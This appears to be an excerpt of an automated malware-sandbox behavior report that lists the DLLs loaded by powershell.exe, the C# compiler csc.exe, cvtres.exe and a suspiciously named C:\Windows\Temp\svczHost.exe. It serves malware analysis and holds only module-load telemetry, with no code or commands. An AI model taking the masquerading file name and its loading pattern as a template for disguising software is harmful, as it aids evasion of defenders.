Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: icu.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: winhttp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: mswsock.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: wshunix.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: dnsapi.dll
